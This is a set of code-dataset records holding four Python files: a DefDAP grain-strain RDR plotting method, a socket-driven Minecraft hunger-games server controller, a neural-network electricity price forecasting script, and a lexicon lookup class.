showPlot: self.plotRDR(grain, group, ulist, vlist, allxlist, allylist, linRegResults)\n\n def plotRDR(self, grain, group, ulist, vlist, allxlist, allylist, linRegResults):\n \"\"\"\n Plot RDR figure, including location of perpendicular lines and scatter plot of ucentered vs vcentered.\n \n Parameters\n ----------\n grain: int\n DIC grain to plot.\n group: int\n Group ID to plot.\n ulist: list\n List of ucentered values.\n vlist: list\n List of vcentered values.\n allxlist: list\n List of all x values.\n allylist: list\n List of all y values.\n linRegResults: numpy.ndarray, {slope, intercept, rvalue, pvalue, stderr}\n Results from linear regression of ucentered vs vcentered.\n\n \"\"\"\n\n # Draw window and axes\n self.rdrPlot = Plot(ax=None, makeInteractive=True, title='RDR Calculation', figsize=(21, 7))\n self.rdrPlot.ax.axis('off')\n self.rdrPlot.grainAx = 
self.rdrPlot.addAxes((0.05, 0.07, 0.20, 0.85))\n self.rdrPlot.textAx = self.rdrPlot.addAxes((0.27, 0.07, 0.20, 0.85))\n self.rdrPlot.textAx.axis('off')\n self.rdrPlot.numLineAx = self.rdrPlot.addAxes((0.48, 0.07, 0.2, 0.85))\n self.rdrPlot.numLineAx.axis('off')\n self.rdrPlot.plotAx = self.rdrPlot.addAxes((0.75, 0.07, 0.2, 0.85))\n\n ## Draw grain plot\n self.rdrPlot.grainPlot = self.currDICGrain.plotMaxShear(fig=self.rdrPlot.fig, ax=self.rdrPlot.grainAx, \n plotColourBar=False, plotScaleBar = True) \n self.rdrPlot.grainPlot.addColourBar(label='Effective Shear Strain', fraction=0.046, pad=0.04)\n\n ## Draw all points\n self.rdrPlot.grainAx.plot(allxlist, allylist, 'rx',lw=0.5)\n for xlist, ylist in zip(allxlist, allylist):\n self.rdrPlot.grainAx.plot(xlist, ylist, '-',lw=1)\n\n ## Generate scatter plot\n slope = linRegResults.slope\n r_value = linRegResults.rvalue\n intercept = linRegResults.intercept\n std_err = linRegResults.stderr\n \n self.rdrPlot.plotAx.scatter(x=vlist,y=ulist,marker='x', lw=1)\n self.rdrPlot.plotAx.plot(\n [np.min(vlist), np.max(vlist)],[slope*np.min(vlist)+intercept,slope*np.max(vlist)+intercept], '-')\n self.rdrPlot.plotAx.set_xlabel('v-centered')\n self.rdrPlot.plotAx.set_ylabel('u-centered')\n self.rdrPlot.addText(self.rdrPlot.plotAx, 0.95, 0.01, 'Slope = {0:.3f} ± {1:.3f}\\nR-squared = {2:.3f}\\nn={3}'\n .format(slope,std_err,r_value**2,len(ulist)), va='bottom', ha='right',\n transform=self.rdrPlot.plotAx.transAxes, fontsize=10);\n\n ## Write grain info\n ebsdGrain = grain.ebsdGrain\n ebsdGrain.calcSlipTraces()\n\n if ebsdGrain.averageSchmidFactors is None:\n raise Exception(\"Run 'calcAverageGrainSchmidFactors' first\")\n\n eulers = np.rad2deg(ebsdGrain.refOri.eulerAngles())\n\n text = 'Average angle: {0:.2f}\\n'.format(grain.groupsList[group][1])\n text += 'Eulers: {0:.1f} {1:.1f} {2:.1f}\\n\\n'.format(eulers[0], eulers[1], eulers[2])\n\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 1, text, fontsize=10, va='top')\n\n ## Write slip system info\n RDRs = []; offset = 0; \n for idx, (ssGroup, sfGroup, slipTraceAngle) in enumerate(\n zip(grain.ebsdMap.slipSystems, ebsdGrain.averageSchmidFactors, np.rad2deg(ebsdGrain.slipTraceAngles))):\n text = \"{0:s} {1:.1f}\\n\".format(ssGroup[0].slipPlaneLabel, slipTraceAngle)\n tempRDRs = [];\n for ss, sf in zip(ssGroup, sfGroup):\n slipDirSample = ebsdGrain.refOri.conjugate.transformVector(ss.slipDir)\n text = text + \" {0:s} SF: {1:.3f} RDR: {2:.3f}\\n\".format\\\n (ss.slipDirLabel, sf,-slipDirSample[0]/slipDirSample[1])\n RDR = -slipDirSample[0]/slipDirSample[1]\n tempRDRs.append(RDR)\n RDRs.append(tempRDRs) \n\n if idx in grain.groupsList[group][2]:\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 0.9-offset, text, weight='bold', fontsize=10, va='top')\n else:\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 0.9-offset, text, fontsize=10, va='top')\n\n offset += 0.0275 * text.count('\\n')\n\n # Plot RDR values on number line\n uniqueRDRs = set()\n for x in [item for sublist in RDRs for item in sublist]: uniqueRDRs.add(x)\n self.rdrPlot.numLineAx.axvline(x=0, ymin=-20, ymax=20, c='k')\n self.rdrPlot.numLineAx.plot(np.zeros(len(uniqueRDRs)), list(uniqueRDRs), 'bo', label='Theroretical RDR values')\n self.rdrPlot.numLineAx.plot([0], slope, 'ro', label='Measured RDR value')\n self.rdrPlot.addText(self.rdrPlot.numLineAx, -0.009, slope-0.01, '{0:.3f}'.format(float(slope)))\n self.rdrPlot.numLineAx.legend(bbox_to_anchor=(1.15, 1.05))\n \n # Label RDRs by slip system on number line \n for RDR in list(uniqueRDRs):\n 
self.rdrPlot.addText(self.rdrPlot.numLineAx, -0.009, RDR-0.01, '{0:.3f}'.format(float(RDR)))\n txt = ''\n for idx, ssGroup in enumerate(RDRs):\n for idx2, rdr in enumerate(ssGroup):\n if rdr == RDR:\n txt += str('{0} {1} '.format(self.currEBSDMap.slipSystems[idx][idx2].slipPlaneLabel, \n self.currEBSDMap.slipSystems[idx][idx2].slipDirLabel))\n self.rdrPlot.addText(self.rdrPlot.numLineAx,0.002, RDR-0.01, txt)\n\n self.rdrPlot.numLineAx.set_ylim(slope-1, slope+1)\n self.rdrPlot.numLineAx.set_xlim(-0.01, 0.05)\n","sub_path":"defdap/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":20495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"291243467","text":"# def server_command(cmd):\r\n# process.stdin.write(cmd+\"\\n\") #just write the command to the input stream\r\n# process = None\r\n# executable = '\"C:/Program Files/Java/jre1.8.0_191/bin/java.exe\" -Xms4G -Xmx4G -jar \"D:/gd/minecraft_1.15.2/server (6).jar\" nogui java'\r\n# while True:\r\n# command=input()\r\n# command=command.lower()\r\n# if process is not None:\r\n# if command==(\"start\"):\r\n# os.chdir(minecraft_dir)\r\n# process = subprocess.Popen(executable, stdin=subprocess.PIPE)\r\n# print(\"Server started.\")\r\n# else:\r\n# server_command(command)\r\n\r\nimport socket\r\nimport os\r\nimport time\r\nimport pickle\r\nimport numpy as np\r\nimport copy\r\nimport wexpect\r\nimport json\r\nimport random\r\n# import subprocess\r\n# import time\r\n\r\n# mc_server=subprocess.Popen('\"C:/Program Files/Java/jre1.8.0_191/bin/java.exe\" -Xms4G -Xmx4G -jar \"D:/gd/minecraft_1.15.2/server (6).jar\" nogui java',shell=False,stdout=subprocess.PIPE,stdin=subprocess.PIPE)\r\n# mc_server.stdin.write(b'/time set midnight \\n')\r\n# #mc_server.stdin.close()\r\n# mc_server.stdin.flush()\r\n\r\n#this function takes a wexpect connection and returns the player list\r\n#need to adda try catch to this\r\ndef capture_player_list(mc_server):\r\n #print(player_list)\r\n #the start and end of the substring we will be taking\r\n while(True):\r\n #print(mc_server)\r\n #this first line basically just flushed the buffer becaause we want only the output of \"/list\". It will be overwritten\r\n throwRA=mc_server.read_nonblocking()\r\n mc_server.sendline('/list')\r\n time.sleep(0.2)\r\n player_list=mc_server.read_nonblocking()\r\n if ('20 players online:' in player_list) and (not('lost connection: Disconnected' in player_list)) and (not('the game' in player_list)) and player_list.count(\"[Server thread/INFO]\")==1:\r\n print(player_list)\r\n start=player_list.find('20 players online:')+len('20 players online:')+1\r\n end=player_list.rfind('\\r\\n')\r\n players=player_list[start:end].replace(\",\",\"\").split(\" \")\r\n break\r\n return(players)\r\n\r\n#stock server \r\ndef stop_server(mc_server):\r\n mc_server.sendline('/stop')\r\n\r\n#create team block\r\ndef create_teams():\r\n landing=[\"\"]*10\r\n team1=[\"\"]*10\r\n team2=[\"\"]*10\r\n team3=[\"\"]*10\r\n team4=[\"\"]*10\r\n return([landing,team1,team2,team3,team4])\r\n\r\n#for soem reason this function is working on global varibales.\r\ndef update_position(team_data,x,y,new_value):\r\n data=copy.deepcopy(team_data)\r\n data[x][y]=new_value\r\n return(data)\r\n # data=team_data\r\n # data[x][y]=new_value\r\n #return(data)\r\n\r\n\r\n#team_to_add_to is an integer with the group number landing(0), team1(1), team2(2), team3(3), team4(4)\r\ndef add_to_team(team_data,team_to_add_to,name):\r\n #for the team which will have a member added we should find where the next empty slot is\r\n # team_data[team_to_add_to]\r\n filled_already=[]\r\n for poss in team_data[team_to_add_to]:\r\n filled_already.append(not(poss==\"\"))\r\n if sum(filled_already)>9:\r\n #to prevent an error out if over 10 players in one team just return unchanged\r\n return(team_data)\r\n else:\r\n new_free_position=sum(filled_already)\r\n #print(new_free_position)\r\n return(update_position(team_data,x=team_to_add_to,y=new_free_position,new_value=name))\r\n\r\ndef clean_slots(the_list):\r\n if the_list[the_list.index(\"\")+1]==\"\":\r\n return(the_list)\r\n else:\r\n new_list=the_list[0:the_list.index(\"\")] + the_list[the_list.index(\"\")+1:10] + [\"\"]\r\n # 
new_list.append(the_list[0:the_list.index(\"\")])\r\n # new_list.append(the_list[the_list.index(\"\")+1:9])\r\n # new_list.append(\"\")\r\n return(new_list)\r\n\r\n#remove player from a team\r\ndef remove_from_team(team_data,team_to_remove_from,name):\r\n team_data_copy=copy.deepcopy(team_data)\r\n temp_team=team_data_copy[team_to_remove_from]\r\n removed_team=[]\r\n for i in temp_team:\r\n if name==i:\r\n removed_team.append(\"\")\r\n else:\r\n removed_team.append(i)\r\n #the slot is now empty. players below should be bumped up\r\n team_data_copy[team_to_remove_from]=clean_slots(removed_team)\r\n return(team_data_copy)\r\n\r\n#find the position of a player in the teams\r\ndef find_member_on_team(mylist,char):\r\n for sub_list in mylist:\r\n if char in sub_list:\r\n return (mylist.index(sub_list), sub_list.index(char))\r\n raise ValueError(\"'{char}' is not in list\".format(char = char))\r\n\r\n#update the team data and account for any logins or disconnects\r\ndef check_current_login(mc_server,accounted,team_data):\r\n active_players=capture_player_list(mc_server)\r\n #find any players that are new logins\r\n player_unaccounted=[]\r\n for i in active_players:\r\n player_unaccounted.append(not(i in accounted))\r\n print(i)\r\n player_unaccounted=np.array(active_players)[np.array(player_unaccounted)]\r\n #if there are new players, we should add them to the landing page\r\n if not(len(player_unaccounted)==0):\r\n for player in player_unaccounted:\r\n team_data=add_to_team(team_data,team_to_add_to=0,name=player)\r\n accounted.append(player)\r\n #now check for player which have logged out\r\n player_left=[]\r\n for i in accounted:\r\n player_left.append(not(i in active_players))\r\n #get names of players that logged out\r\n player_logged=np.array(accounted)[np.array(player_left)]\r\n print(len(player_logged))\r\n if not(len(player_logged)==0):\r\n print(\"player left!\")\r\n for player in player_logged:\r\n #need add a function to find where the person is if they moved a team already\r\n a,b=find_member_on_team(team_data,player)\r\n team_data=remove_from_team(team_data,a,name=player)\r\n print(team_data)\r\n print(player)\r\n #remove these players from accounted\r\n accounted=np.array(accounted)[np.array([not i for i in player_left])]\r\n accounted=accounted.tolist()\r\n #return all varibales that change\r\n return(team_data,accounted)\r\n\r\ndef move_player_to_team(team_data,player_to_move,new_team):\r\n for sub_list in team_data:\r\n if player_to_move in sub_list:\r\n x,y=team_data.index(sub_list), sub_list.index(player_to_move)\r\n team_data=remove_from_team(team_data=team_data,team_to_remove_from=x,name=player_to_move)\r\n team_data=add_to_team(team_data=team_data,team_to_add_to=new_team,name=player_to_move)\r\n return(team_data)\r\n print(\"Could not find the selected player. 
Maybe they logged out\")\r\n print(player_to_move)\r\n return(team_data)\r\n\r\ndef change_player_gamemode(mc_server,player_name,mode):\r\n mc_server.sendline('/gamemode '+mode+\" \"+player_name)\r\n\r\ndef teleport_player(mc_server,player_name,x,y,z):\r\n mc_server.sendline('/teleport '+str(player_name)+\" \"+str(x)+\" \"+str(y)+\" \"+str(z))\r\n\r\ndef create_team(mc_server,team_name):\r\n mc_server.sendline('/team add '+team_name)\r\n\r\ndef add_member_to_team(mc_server,team_name,member_to_add):\r\n mc_server.sendline('/team join '+team_name+\" \"+member_to_add)\r\n\r\ndef kill_all_players(mc_server):\r\n mc_server.sendline('/kill @a')\r\n\r\ndef set_world_border(mc_server,worldborder_size,time=\"\"):\r\n if time==\"\":\r\n mc_server.sendline('/worldborder set '+str(worldborder_size))\r\n else:\r\n mc_server.sendline('/worldborder set '+str(worldborder_size)+\" \"+str(time))\r\n\r\ndef calculate_teams_and_spawns(team_data,worldborder_center,worldborder_start_size,worldborder_end_size,worldborder_collpase_time):\r\n #first lets find the number of teams which contain at least one player\r\n #we will fill active_team with the indexes of [team_data] which are the teams which will play\r\n active_team_indexes=[]\r\n for sublist in team_data:\r\n for underlist in sublist:\r\n if underlist!=\"\":\r\n active_team_indexes.append(team_data.index(sublist))\r\n break\r\n print(active_team_indexes)\r\n if len(active_team_indexes)==0:\r\n print(\"Error. no active teams found.\")\r\n else:\r\n print(\"teams found.\")\r\n #now lets calculate the possible spawn locations. \r\n xhigh=worldborder_center[0]+(worldborder_start_size/2)\r\n xlow=worldborder_center[0]-(worldborder_start_size/2)\r\n yhigh=worldborder_center[1]+(worldborder_start_size/2)\r\n ylow=worldborder_center[1]-(worldborder_start_size/2)\r\n loc_1=[xhigh,ylow]\r\n loc_2=[xlow,yhigh]\r\n loc_3=[xlow,ylow]\r\n loc_4=[xhigh,yhigh]\r\n possible_spawns=[loc_1,loc_2,loc_3,loc_4]\r\n random.shuffle(possible_spawns)\r\n return(active_team_indexes,possible_spawns[0:len(active_team_indexes)])\r\n\r\n# calculate_teams_and_spawns(test.teams,test.worldborder_center_location,test.worldborder_start_size,test.worldborder_end_size,3600)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass player:\r\n def __init__(self):\r\n self.teams=create_teams()\r\n self.mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java',cwd=os.path.abspath(\"D:\\\\gd\\\\minecraft_1.15.2\"))\r\n self.accounted=[]\r\n self.worldborder_center_location=[0,0]\r\n self.worldborder_start_size=1000\r\n self.worldborder_end_size=100\r\n self.worldborder_collapse_time=3600\r\n self.initiate_match_teams_indexes=[]\r\n self.initiate_match_teams_spawn_locations=[]\r\n self.total_players=[]\r\n self.check_players_time=0\r\n def check_players(self):\r\n if (time.time()-self.check_players_time)>1:\r\n try:\r\n self.teams,self.accounted=check_current_login(mc_server=self.mc_server,accounted=self.accounted,team_data=self.teams)\r\n self.check_players_time=time.time()\r\n except:\r\n print(\"check_players_error_rebound\")\r\n def stop_pserver(self):\r\n stop_server(self.mc_server)\r\n def move_player(self,player_to_move,new_team):\r\n self.teams=move_player_to_team(team_data=self.teams,player_to_move=player_to_move,new_team=new_team)\r\n def pre_match_calc(self):\r\n 
self.initiate_match_teams_indexes,self.initiate_match_teams_spawn_locations=calculate_teams_and_spawns(team_data=self.teams,worldborder_center=self.worldborder_center_location,worldborder_start_size=self.worldborder_start_size,worldborder_end_size=self.worldborder_end_size,worldborder_collpase_time=self.worldborder_collapse_time)\r\n def make_teams(self):\r\n #for each team that will play create a team\r\n for i in self.initiate_match_teams_indexes:\r\n #make a clean list of all players. make empty to fill\r\n #create the team name\r\n team_name_assign=str(\"team_\"+str(i))\r\n print(team_name_assign)\r\n create_team(mc_server=self.mc_server,team_name=team_name_assign)\r\n print(\"good\")\r\n #for each team add the members\r\n players_in_team=[]\r\n print(\"good1\")\r\n for player_in_list in self.teams[i]:\r\n if player_in_list!=\"\":\r\n players_in_team.append(player_in_list)\r\n print(players_in_team)\r\n self.total_players.append(players_in_team)\r\n print(self.total_players)\r\n #now we have the list of players, per team add them to the team\r\n print(\"good2\")\r\n for member in players_in_team:\r\n add_member_to_team(mc_server=self.mc_server,team_name=team_name_assign,member_to_add=member)\r\n players_in_team=[]\r\n #delete first element which is the empty list\r\n print(self.total_players)\r\n # del self.total_players[0]\r\n def start_match(self):\r\n self.mc_server.sendline('/say Command to Initiate Match Received.')\r\n self.mc_server.sendline('/say Calculating teams and spawn locations...')\r\n self.mc_server.sendline('/say Assigning players to their teams...')\r\n self.pre_match_calc()\r\n self.make_teams()\r\n self.mc_server.sendline('/say Killing All Players in 10 seconds... Please Respawn to be Full Health')\r\n time.sleep(10)\r\n kill_all_players(mc_server=self.mc_server)\r\n self.mc_server.sendline('/say Teleporting teams to their respective start locations in 5 seconds...')\r\n time.sleep(5)\r\n set_world_border(mc_server=self.mc_server,worldborder_size=self.worldborder_start_size,time=\"\")\r\n #\r\n #make all players creative before the jump\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n change_player_gamemode(mc_server=self.mc_server,player_name=indiv_player,mode=\"creative\")\r\n print(\"creative\")\r\n #\r\n #teleport teams to staarting\r\n x=0\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n teleport_player(mc_server=self.mc_server,player_name=indiv_player,x=self.initiate_match_teams_spawn_locations[int(x)][0],y=200,z=self.initiate_match_teams_spawn_locations[int(x)][1])\r\n print(indiv_player)\r\n print(self.initiate_match_teams_spawn_locations[int(x)][0],self.initiate_match_teams_spawn_locations[int(x)][0])\r\n x=x+1\r\n time.sleep(10)\r\n print(\"teleport\")\r\n #\r\n #after players survive the fall turn them back to survival\r\n #make all players creative before the jump\r\n x=0\r\n for sublist in self.total_players:\r\n for indiv_player in sublist:\r\n change_player_gamemode(mc_server=self.mc_server,player_name=indiv_player,mode=\"survival\")\r\n print(indiv_player)\r\n x=x+1\r\n set_world_border(mc_server=self.mc_server,worldborder_size=self.worldborder_end_size,time=self.worldborder_collapse_time)\r\n self.initiate_match_teams_indexes=[]\r\n self.initiate_match_teams_spawn_locations=[]\r\n self.total_players=[]\r\n\r\n\r\n\r\n# test.stop_pserver()\r\n# test=player()\r\n# test.teams\r\n# test.teams[1][0]=\"aaron\"\r\n# test.teams[2][0]=\"aaronddd\"\r\n# test.pre_match_calc()\r\n# test.make_teams()\r\n# 
test.total_players\r\n\r\n\r\n\r\n# test=player()\r\n# time.sleep(5)\r\n# test.check_players()\r\n# player.teams\r\n# player.accounted\r\n\r\n#aaro=capture_player_list(mc_server)\r\n\r\n\r\n#mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java')\r\n# mc_server=wexpect.spawn('java -Xms4G -Xmx4G -jar \"server (6).jar\" nogui java',cwd=os.path.abspath(\"D:\\\\gd\\\\minecraft_1.15.2\"))\r\n# mc_server.sendline('/time set midnight')\r\n#printout the buffer holding the console output\r\n\r\n\r\n\r\n\r\n# print(mc_server.read_nonblocking())\r\n\r\n#players=capture_player_list(mc_server)\r\n\r\n#list for players already accounted for\r\n\r\n\r\n\r\nHOST = '' # Symbolic name meaning all available interfaces\r\nPORT = 50008 # Arbitrary non-privileged port\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((HOST, PORT))\r\ns.listen(1)\r\ntest=player()\r\ntime.sleep(5)\r\nwhile True:\r\n clientsocket, addr = s.accept()\r\n print(\"computer\", addr, \"connected.\")\r\n msg=clientsocket.recv(1024)\r\n msg=json.loads(msg.decode(\"utf-8\"))\r\n if msg[0]==\"ch_team\":\r\n #extract list of players to be moved\r\n player_move=msg[2][:-1]\r\n player_move=player_move.split(\" \")\r\n for player in player_move:\r\n test.move_player(player_to_move=player,new_team=int(msg[1]))\r\n elif msg[0]==\"update_teams\": \r\n test.check_players()\r\n elif msg[0]==\"worldborder_start\":\r\n test.worldborder_start_size=int(msg[1])\r\n elif msg[0]==\"worldborder_end\":\r\n test.worldborder_end_size=int(msg[1])\r\n elif msg[0]==\"worldborder_time_move\":\r\n test.worldborder_collapse_time=int(msg[1])\r\n elif msg[0]==\"start_game\":\r\n test.start_match()\r\n temp_teams=copy.deepcopy(test.teams)\r\n temp_teams.append([test.worldborder_start_size,test.worldborder_end_size,test.worldborder_collapse_time])\r\n to_send=temp_teams\r\n # to_send=test.teams\r\n clientsocket.sendall(bytes(json.dumps(to_send),encoding=\"utf-8\"))\r\n \r\n","sub_path":"minecraft_1.15.2/hunger_games.py","file_name":"hunger_games.py","file_ext":"py","file_size_in_byte":16139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"442518766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 12 20:57:19 2020\n\n@author: bnebe\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn.preprocessing as pp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn.neural_network import MLPRegressor\n\nimport time\nstart_time = time.time()\n\ndf_raw = pd.read_csv(\"final_df.csv\", index_col=0, parse_dates=True)\n\n# Copy raw file, filter down years and columns\ndf = df_raw.copy()\ndf = df.loc['2018-01-01':'2019-12-31']\ndf = df[['dewpoint', 'rel_humidity', 'temperature', 'wind_direction', 'wind_speed',\n 'Fuel_Price', 'Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW', 'Year', \n 'Month', 'Day', 'Hour', 'Weekday', 'Weekend', 'LMP_Price_Per_MWh']]\n\n\n# Feature creation\n# Create wind vectors\ndf['wind_x'] = df['wind_speed'] * np.cos(np.deg2rad(df['wind_direction']))\ndf['wind_y'] = df['wind_speed'] * np.sin(np.deg2rad(df['wind_direction']))\n\n# Create two weeks worth of lagged variables 168\nfor i in range (1, (24*7)):\n df['LMP_Price_Per_MWh -' + str(i) + 'h'] = df['LMP_Price_Per_MWh'].shift(i)\n\n# Create 48 hour lagged CAISO data 48\nfor i in range (1, 24):\n for item in ['Fuel_Price', 'Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW']:\n df[item + ' -' + str(i) + 'h'] = df[item].shift(i)\n\n# Create rolling averages\nfor item in ['Wind_MW', 'Solar_MW', 'Demand_DLAP_MW', 'Demand_MW', 'LMP_Price_Per_MWh', 'temperature']:\n if item in ['Solar_MW', 'Wind_MW']:\n df[item + ' 12 roll avg'] = df[item].rolling(window=12).mean()\n else:\n df[item + ' 4 roll avg'] = df[item].rolling(window=4).mean()\n\n# Target DataFrame\n# Create future y's for \ntarget_df = pd.DataFrame(data = df['LMP_Price_Per_MWh'], index = df.index)\nfor i in range (1, 24):\n target_df['LMP_Price_Per_MWh +' + str(i) + 'h'] = target_df['LMP_Price_Per_MWh'].shift(-i)\ntarget_df = target_df.drop(labels = ['LMP_Price_Per_MWh'], axis = 1)\n\n\n# Random split\nX_train, X_test, y_train, y_test = train_test_split(df, target_df, test_size=0.25, random_state=1)\n\n\n# Pre-process Train\nss = pp.StandardScaler()\nX_train = pd.DataFrame(ss.fit_transform(X_train), index=y_train.index)\n\n# Drop NANs after to avoid lagged variables losing values and skewing the scaling\nX_train = X_train.dropna()\ny_train = y_train.loc[X_train.index]\n\ny_train = y_train.dropna()\nX_train = X_train.loc[y_train.index]\n\n\n# MLP Regressor\nregr = MLPRegressor(hidden_layer_sizes = (30, 40, 50, 60, 70), activation = 'relu', solver = 'adam', alpha = 0.05, max_iter=300)\nregr.fit(X_train, y_train)\nprint('R^2:', regr.score(X_train, y_train))\n\nprint('Time to finish: ', (time.time()-start_time)/60)\n\n","sub_path":"Development/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"415975959","text":"#!/usr/bin/env python3\n# lexicon.py jcj 2019-02-20, 2020-01-23\n\n'''A class to implement a lexicon with methods for prefixes and suffixes,\nregular expressions, anagrams, etc'''\n\nimport bisect\nimport re\nimport unicodedata as ud\nfrom collections import defaultdict\n\nINTERVAL = 5 # How often in % is progress notified?\nPASSES = 4 # How many times is each entry processed?\n\nclass LexiconError(Exception):\n\tpass\n\nclass Lexicon:\n\n\tdef __init__(self, fileName, caseBlind=False, diacBlind=False, busyWait=None):\n\t\t'''Initialize an object representing a lexicon from a disk file\n\t\tconsisting of one entry per line (unique but not necessarily sorted)\n\t\twith possible comment lines beginning with a hash sign.\n\t\tMethods are provided for lookup, with possible disregard of\n\t\tcase and/or diacritics, of whole words, prefixes, suffixes,\n\t\tregular expressions, and anagrams. Lookup of whole words and anagrams\n\t\tis optimized. Provision is made for callback to an optional\n\t\tfunction or method to display progress information.'''\n\t\tself.fileName = fileName\n\t\tself.caseBlind = caseBlind\n\t\tself.diacBlind = diacBlind\n\t\tif not busyWait:\n\t\t\tbusyWait = lambda percent, message: None\n\t\tself.words = [] # list of sorted, normalized words\n\t\tself.refs = defaultdict(list) # dict from normalized words\n\t\t # to lists of reference forms\n\t\t\t\t\t\t\t\t\t\t # eg POLISH -> [Polish, polish]\n\t\tself.anags = defaultdict(list) # dict from normalized anagrams\n\t\t # to lists of anagrammatic forms\n\t\t\t\t\t\t\t\t\t\t # eg abeert -> [beater, berate, rebate]\n\t\ttry:\n\t\t\tf = open(fileName)\n\t\texcept Exception as err:\n\t\t\traise LexiconError(err)\n\t\tbusyWait(0, 'Reading...')\n\t\t# Read in a list of lines, without showing any progress.\n\t\t# But then use the number of words read in to time progress updates\n\t\tlines = [ line.rstrip('\\n') for line in f.readlines()\n\t\t\t\t\tif not line.startswith('#') ]\n\t\tself.numLines = len(lines)\n\t\tpcPerLine = 100 / (self.numLines * PASSES) # NB result is a real\n\t\tpcDone = pcPerLine * self.numLines # for the read itself\n\t\t# build dict of normalized forms in self.refs\n\t\tbusyWait(round(pcDone), 'Normalizing...')\n\t\tfor line in lines:\n\t\t\tpcDone += pcPerLine\n\t\t\tif pcDone % INTERVAL < pcPerLine:\n\t\t\t\tbusyWait(round(pcDone), 'Normalizing...')\n\t\t\tself.refs[self.normalized(line, caseBlind, diacBlind)].append(line)\n\t\t# build sorted list of normalized word forms for lookup\n\t\tbusyWait(round(pcDone), 'Sorting...')\n\t\tself.words = sorted(self.refs) # includes only the keys\n\t\tpcDone += pcPerLine * self.numLines\n\t\t# build a separate dictionary of normalized anagram forms\n\t\tbusyWait(round(pcDone), 'Hashing...')\n\t\tfor line in lines: \n\t\t\tpcDone += pcPerLine\n\t\t\tif pcDone % INTERVAL < pcPerLine:\n\t\t\t\tbusyWait(round(pcDone), 'Hashing...')\n\t\t\thash = self.anagramHash(line)\n\t\t\tself.anags[hash].append(line)\n\t\tbusyWait(100, 'Done.')\n\t\tf.close()\n\t\n\tdef normalized(self, s, caseBlind, diacBlind):\n\t\t'''Apply needed transformations to ignore case and/or accents'''\n\t\tif caseBlind:\n\t\t\ts = s.upper()\n\t\tif diacBlind:\n\t\t\ts = ud.normalize('NFKD', s)\n\t\t\ts = ''.join([c for c in s if not ud.combining(c)])\n\t\treturn s\n\t\t\n\tdef length(self):\n\t\t'''Return the number of entries'''\n\t\treturn self.numLines\n\n\tdef anagramHash(self, s):\n\t\t'''Create a unique hash for anagram purposes, ignoring\n\t\torder, letter-case, and all 
punctuation. Diacritics\n\t\tare ignored only if self.diacBlind is set'''\n\t\t# Unfortunately the \\w class (Unicode 'word' characters)\n\t\t# includes the underscore, so _ must be special-cased\n\t\ts = s.replace('_', '')\n\t\t# Upper-case the string, remove all characters which are not \\w,\n\t\t# and sort the result: thus all anagrammatic strings get the same hash\n\t\treturn ''.join(sorted(re.sub(r'\\W', '',\n\t\t\t\t\t\tself.normalized(s, True, self.diacBlind))))\n\n\tdef contains(self, word):\n\t\t'''Return a list of matching words'''\n\t\tword = self.normalized(word, self.caseBlind, self.diacBlind)\n\t\ti = bisect.bisect_left(self.words, word)\n\t\tif i != len(self.words) and self.words[i] == word:\n\t\t\treturn self.refs[word]\n\t\telse:\n\t\t\treturn []\n\n\tdef regex(self, pattern):\n\t\t'''Return list of matching words'''\n\t\t# we can normalize case but we can't do anything about diacritics\n\t\tflags = re.IGNORECASE if self.caseBlind else 0\n\t\tpattern = re.compile(pattern, flags)\n\t\tmatches = []\n\t\tfor word in self.words:\n\t\t\tm = pattern.search(word)\n\t\t\tif m:\n\t\t\t\tmatches.extend(self.refs[word])\n\t\treturn matches\n\n\tdef hasPrefix(self, prefix):\n\t\t'''Return whether there is any word that begins with prefix'''\n\t\tprefix = self.normalized(prefix, self.caseBlind, self.diacBlind) \n\t\tfor word in self.words:\n\t\t\tif word.startswith(prefix):\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef withPrefix(self, prefix):\n\t\t'''Return a list of words with prefix'''\n\t\tprefix = self.normalized(prefix, self.caseBlind, self.diacBlind)\n\t\treturn [ ' '.join(self.refs[w]) for w in self.words\n\t\t\t\t\tif w.startswith(prefix) ]\n\n\tdef hasSuffix(self, suffix):\n\t\t'''Return whether there is any word that ends with suffix'''\n\t\tsuffix = self.normalized(suffix, self.caseBlind, self.diacBlind)\n\t\tif self.caseBlind:\n\t\t\tsuffix = suffix.upper()\n\t\tfor word in self.words:\n\t\t\tif word.endswith(suffix):\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef withSuffix(self, suffix):\n\t\t'''Return a list of words with suffix'''\n\t\tsuffix = self.normalized(suffix, self.caseBlind, self.diacBlind)\n\t\treturn [ ' '.join(self.refs[w]) for w in self.words\n\t\t\t\t\tif w.endswith(suffix) ]\n\n\n\tdef anagrams(self, word):\n\t\t'''Return a list of anagrams of word, ignoring case and punctuation''' \n\t\treturn self.anags.get(self.anagramHash(word), [])\n\ndef main():\n\tprint('This module is intended to be imported rather than run standalone.')\n\tprint('Use as \"import lexicon\" or \"from lexicon import Lexicon, LexiconError\".')\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"archive/non-i18n/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
